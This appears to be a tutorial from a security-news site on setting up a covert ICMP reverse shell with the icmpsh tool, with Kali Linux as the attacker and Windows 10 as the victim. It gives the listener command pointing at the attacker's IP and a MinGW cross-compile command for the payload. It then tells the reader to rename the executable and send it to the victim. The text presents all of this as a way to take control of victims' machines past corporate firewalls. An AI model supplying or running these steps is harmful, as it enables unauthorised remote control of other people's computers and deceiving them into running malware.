ICMP Shell- Secret Command and Control Channel to Control Victims Machine Using Ping

Corporate firewalls can block reverse and bind TCP connections. However, corporate firewalls are behind internal networks. So we can use PING as a great convert channel to get victim shell access using ICMP Shell.

Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)


  • Download the ICMP SHELL tool Here
  • execute command  ./ shell script with 777 Permissions ( read,write,execute)
  • The output of shell script command will give a piece of code icmpsh.exe -t -d 500 -b 30 -s 128.


  • Upload “icmpsh.exe” on the victim machine.
  • Run CMD and  Execute “icmpsh.exe -t <Attackers IP> -d 500 -b 30 -s 128” as listener.
  • Here Listener script will be icmpsh.exe -t -d 500 -b 30 -s 128.
  • Execute this with CMD  & No admin privileges needed.

Also Read :  Operating Systems can be detected using Ping Command


  • Once the Listener is executed on my windows 10 victim machine, Here we got a shell with ICMP.
  • So we can start our command and control of victim pc.
  • So only, ICMP requests/responses traffic only sent via attackers machine to victims machine.


  • If you want to compromise victim directly by click, you can download c code here
  • After download compile the c code with directly with known victim IP and Install MinGW in Kali Linux and run the following command to compile the C file i686-w64-mingw32-gcc icmp-slave-complete.c -o icmp-slave-complete.exe
  • Now you can Rename icmp-slave-complete.exe and send to the victim.SHELL SHELL SHELL !!!

Recent Posts

Burp Suite 2023.6 Released – What’s New!

PortSwigger released a brand-new version of Burp Suite 2023.6 that is intended for both Professional…

16 hours ago

North Korean Hackers Mimic Journalists To Steal Credentials From Organizations

The North Korean APT group Kimsuky has been running a social engineering operation that targets experts…

1 day ago

Over 60,000 Android Apps Silently Install Malware on Devices

Recently, cybersecurity researchers uncovered that over 60,000 Android applications had been stealthily disguised as genuine…

1 day ago

Google Chrome Zero-Day Vulnerability Exploited Widely – Urgent Update

Google has recently taken prompt security measures by releasing a security update for its Chrome…

2 days ago

MOVEit Hack – BBC, British Airways Employees Contact and Financial Data Exposed

A major MOVEit Hack has impacted many businesses, notably the BBC, British Airways, Boots, and…

2 days ago

10 Best Vulnerability Scanner Tools For Penetration Testing – 2023

A Vulnerability Scanner Tools is one of the essential tools in IT departments Since vulnerabilities…

2 days ago